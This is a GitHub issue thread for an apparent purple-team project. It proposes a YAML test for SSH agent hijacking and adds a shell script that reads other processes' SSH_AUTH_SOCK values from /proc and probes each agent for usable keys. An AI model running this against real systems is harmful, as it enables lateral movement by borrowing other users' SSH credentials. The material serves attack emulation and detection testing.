SSH Hijacking linux lateral movement addition proposal #9
Comments
@paragonsec If you submit a diff with the actual YAML file I would be able to merge these faster. -CG
@carnal0wnage Created a pull request with the proposed file. Thanks!
@carnal0wnage Question outside of this issue. I am putting together data exfil techniques on Linux for this project. However, there are a ton of different methods like using netcat, /dev/tcp, telnet, DNS, ssh, etc. Would it be better to separate them into their own specific yml files according to technique, like one for nc, one for DNS, etc.?
If they are the same technique I think you can put them in one file. People can grab a line or two and make their own YAML... that's the vision anyway :-)
Sounds good. Will try not to get too carried away with this lol. This is an awesome project!
Thanks! I really appreciate you submitting things. Keep 'em coming :-)
Accepted the diff. Thanks again!
Below is my proposal for SSH Hijacking for lateral movement.
```yaml
enabled: true
meta:
  author: paragonsec
  created: 2018-03-22
  decorations:
    description: Lateral Movement with SSH Agent Hijacking
    link: https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking
    mitre_link: https://attack.mitre.org/wiki/Technique/T1184
    mitre_attack_phase: Lateral Movement
    mitre_attack_technique: Lateral Movement with SSH Agent Hijacking
purple_actions:
  # 1. is agent forwarding turned on for outbound sessions from this host?
  1: grep -e ForwardAgent ~/.ssh/config > ssh_config.txt
  # 2. full process list (-e), with the [s] trick so grep does not match itself
  2: ps -ef | grep -i -e "[s]sh-agent" > ssh_process.txt
  # 3. agent socket paths from every readable environ; the permission errors
  #    come from cat on other users' processes, so that is where they are silenced
  3: cat /proc/*/environ 2>/dev/null | tr -s '\0' '\n' | grep SSH_AUTH_SOCK | sort -u > ssh_agent.txt
os: linux
name: Lateral Movement with SSH Agent Hijacking
```
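The three purple actions above only collect evidence; what makes the technique lateral movement is the next step, pointing SSH_AUTH_SOCK at a socket you can reach and asking that agent to sign for you. The script below is an added example, not code from the issue or from the project's YAML: it wraps the three actions in functions (full process listing, comment-aware config match, errors silenced on the read rather than on sort) and then probes each discovered socket with `ssh-add -l`, whose exit code says whether the agent is reachable and holds identities. It assumes Linux /proc, GNU or BusyBox coreutils and the OpenSSH client tools; the function names, the optional proc-root argument used for testing, and the SSH_AGENT_CHECK_LIB switch are this example's own. Note also that ATT&CK has since revoked T1184; the technique now lives under T1563.001 (Remote Service Session Hijacking: SSH Hijacking).

```shell
#!/bin/sh
# Added example, not code from the issue or the project. Assumptions: Linux
# /proc layout, coreutils (tr, sort, awk, sed), OpenSSH ssh-add. Function names
# and the optional proc-root argument are this example's own.

set -u

# Action 1. Is ForwardAgent enabled? Matches "ForwardAgent yes" in any case with
# leading whitespace, skips commented-out lines, and -s keeps a missing file
# quiet so one call can cover ~/.ssh/config and /etc/ssh/ssh_config together.
agent_forwarding_enabled() {
    grep -Eiqs '^[[:space:]]*ForwardAgent[[:space:]]+yes' "$@"
}

# Action 2. PIDs of every ssh-agent on the box. Matching on comm= instead of
# piping ps into grep means the grep process can never match itself.
ssh_agent_pids() {
    ps -eo pid=,comm= | awk '$2 == "ssh-agent" { print $1 }'
}

# Action 3. Walk <root>/<pid>/environ (root defaults to /proc; a constructed
# tree can be passed in for testing) and print unique "uid socket" pairs.
# Other users' environ files are unreadable without root, hence the -r check
# and the 2>/dev/null on the read, not on sort.
list_auth_socks() {
    root="${1:-/proc}"
    for env_file in "$root"/[0-9]*/environ; do
        [ -r "$env_file" ] || continue
        pid_dir="${env_file%/environ}"
        uid=$(awk '/^Uid:/ { print $2 }' "$pid_dir/status" 2>/dev/null)
        sock=$(tr '\0' '\n' < "$env_file" 2>/dev/null | sed -n 's/^SSH_AUTH_SOCK=//p')
        [ -n "$sock" ] && printf '%s %s\n' "${uid:-?}" "$sock"
    done | sort -u
}

# The hijack itself: point SSH_AUTH_SOCK at a socket and list its identities.
# ssh-add -l exits 0 with keys loaded, 1 if the agent is empty, 2 if the agent
# cannot be contacted; we return 2 early when the socket is not ours to open.
probe_agent() {
    sock="$1"
    [ -S "$sock" ] && [ -w "$sock" ] || return 2
    SSH_AUTH_SOCK="$sock" ssh-add -l >/dev/null 2>&1
}

main() {
    if agent_forwarding_enabled "${HOME:-/nonexistent}/.ssh/config" /etc/ssh/ssh_config; then
        echo "[*] ForwardAgent yes: sessions from this host expose this user's agent on the remote side"
    else
        echo "[*] ForwardAgent not enabled in client config"
    fi
    echo "[*] ssh-agent PIDs: $(ssh_agent_pids | tr '\n' ' ')"
    echo "[*] SSH_AUTH_SOCK values found in /proc:"
    list_auth_socks | while read -r uid sock; do
        rc=0; probe_agent "$sock" || rc=$?
        case $rc in
            0) state="USABLE: identities loaded, ssh to the next host will use them" ;;
            1) state="reachable, but the agent holds no identities" ;;
            *) state="could not query agent (not reachable from this uid, or ssh-add missing)" ;;
        esac
        printf '    uid=%s %s -> %s\n' "$uid" "$sock" "$state"
    done
}

# Set SSH_AGENT_CHECK_LIB=1 to source the functions without running the scan.
[ -n "${SSH_AGENT_CHECK_LIB:-}" ] || main "$@"
```

Run it as root to see every user's sockets; as an unprivileged user it only reports sockets whose directory you can traverse, which with OpenSSH means your own (forwarded agents land in `/tmp/ssh-XXXXXXXXXX/agent.<pid>`, in a 0700 directory owned by the forwarding user). A "USABLE" line is the finding the purple action is meant to surface: any process under that uid, or root, can authenticate onward as the key owner without ever touching key material.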